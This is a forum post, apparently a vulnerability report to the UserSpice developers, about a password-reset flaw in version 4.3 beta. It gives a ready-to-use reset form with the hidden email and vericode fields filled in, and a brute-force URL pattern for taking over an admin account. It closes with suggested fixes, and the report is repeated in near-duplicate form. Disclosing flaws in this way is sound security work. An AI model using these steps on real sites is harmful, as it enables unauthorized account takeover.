11-05-2017, 02:50 PM
I was testing email verification on my server, and found that userspice system can be easly hacked by knowing ONLY e-mail.
Just tested on lattest 4.3 beta. Any user that knows userspice code or any foreign hacker may easly hack system with just simply revealing hidden form on:
(you can get form code from userspice files or just register a legit user and reset password to copy it)
So insert form code:
<div class="row">
<div class="col-xs-12">
<h2 class="text-center">Hello <?=$ruser->data()->fname;?>,</h2>
<p class="text-center">Please reset your password.</p>
<form action="forgot_password_reset.php?reset=1" method="post">
<?php if(!$errors=='') {?><div class="alert alert-danger"><?=display_errors($errors);?></div><?php } ?>
<div class="form-group">
<label for="password">New Password:</label>
<input type="password" name="password" value="" id="password" class="form-control">
</div>
<div class="form-group">
<label for="confirm">Confirm Password:</label>
<input type="password" name="confirm" value="" id="confirm" class="form-control">
</div>
<input type="hidden" name="csrf" value="d6ce184598d13738a7d4a86a562cc8fe">
<input type="hidden" name="email" value="userspicephp@gmail.com">
<input type="hidden" name="vericode" value="">
<input type="submit" name="resetPassword" value="Reset" class="btn btn-primary">
</form>
<br />
fill data in form:
<input type="hidden" name="csrf" value="d6ce184598d13738a7d4a86a562cc8fe"> - get this on registration page
<input type="hidden" name="email" value="userspicephp@gmail.com"> - default e-mail, if you know admin e-mail, thats it
<input type="hidden" name="vericode" value=""> - VERICODE IGNORED
<input type="submit" name="resetPassword" value="Reset" class="btn btn-primary">
- now you can use this form to reset administrator's password.
1) csrf token is useless in this case and can be copied from registration page
2) Vericode is completely ignored - add check!
3) Vericode is extremely short and unsecure! - this means even if you add vericode check for this form it still will be easly hackable with script! (you will need less than 1 second to guess vericode with bruteforce) and than it's done
you just need to setup this url:
and loop vericode from 0 to 999999
My suggestions:
vericode should be like a token, make it LONG
That's how i craft my vericode (example):
<pre></pre>
Make sure you generate new vericode on every action like:
password reset, verify email, user creation etc
so new solid verycode before every action, so on password reset you generate NEW vericode, store it in db and send it - that should be done when user press "reset" button
This marks that you do not check userinput data. Keep in mind that user can put everything they want into html page, they can also craft any POST and GET request. Just need add solid validation to php.
Thanks!
Just tested on lattest 4.3 beta. Any user that knows userspice code or any foreign hacker may easly hack system with just simply revealing hidden form on:
Code:
http://localhost/us43/users/forgot_password_reset.phpSo insert form code:
<div class="row">
<div class="col-xs-12">
<h2 class="text-center">Hello <?=$ruser->data()->fname;?>,</h2>
<p class="text-center">Please reset your password.</p>
<form action="forgot_password_reset.php?reset=1" method="post">
<?php if(!$errors=='') {?><div class="alert alert-danger"><?=display_errors($errors);?></div><?php } ?>
<div class="form-group">
<label for="password">New Password:</label>
<input type="password" name="password" value="" id="password" class="form-control">
</div>
<div class="form-group">
<label for="confirm">Confirm Password:</label>
<input type="password" name="confirm" value="" id="confirm" class="form-control">
</div>
<input type="hidden" name="csrf" value="d6ce184598d13738a7d4a86a562cc8fe">
<input type="hidden" name="email" value="userspicephp@gmail.com">
<input type="hidden" name="vericode" value="">
<input type="submit" name="resetPassword" value="Reset" class="btn btn-primary">
</form>
<br />
fill data in form:
<input type="hidden" name="csrf" value="d6ce184598d13738a7d4a86a562cc8fe"> - get this on registration page
<input type="hidden" name="email" value="userspicephp@gmail.com"> - default e-mail, if you know admin e-mail, thats it
<input type="hidden" name="vericode" value=""> - VERICODE IGNORED
<input type="submit" name="resetPassword" value="Reset" class="btn btn-primary">
- now you can use this form to reset administrator's password.
1) csrf token is useless in this case and can be copied from registration page
2) Vericode is completely ignored - add check!
3) Vericode is extremely short and unsecure! - this means even if you add vericode check for this form it still will be easly hackable with script! (you will need less than 1 second to guess vericode with bruteforce) and than it's done
you just need to setup this url:
Code:
http://localhost/users/forgot_password_reset.php?email=userspicephp{3bc1fe685386cc4c3ab89a3f76566d8931e181ad17f08aed9ad73b30bf28114d}40gmail.com&vericode=<strong>0</strong>&reset=1My suggestions:
vericode should be like a token, make it LONG
That's how i craft my vericode (example):
<pre>
Code:
public static function getVericode(){
return bin2hex(random_bytes(32));
}Make sure you generate new vericode on every action like:
password reset, verify email, user creation etc
so new solid verycode before every action, so on password reset you generate NEW vericode, store it in db and send it - that should be done when user press "reset" button
This marks that you do not check userinput data. Keep in mind that user can put everything they want into html page, they can also craft any POST and GET request. Just need add solid validation to php.
Thanks!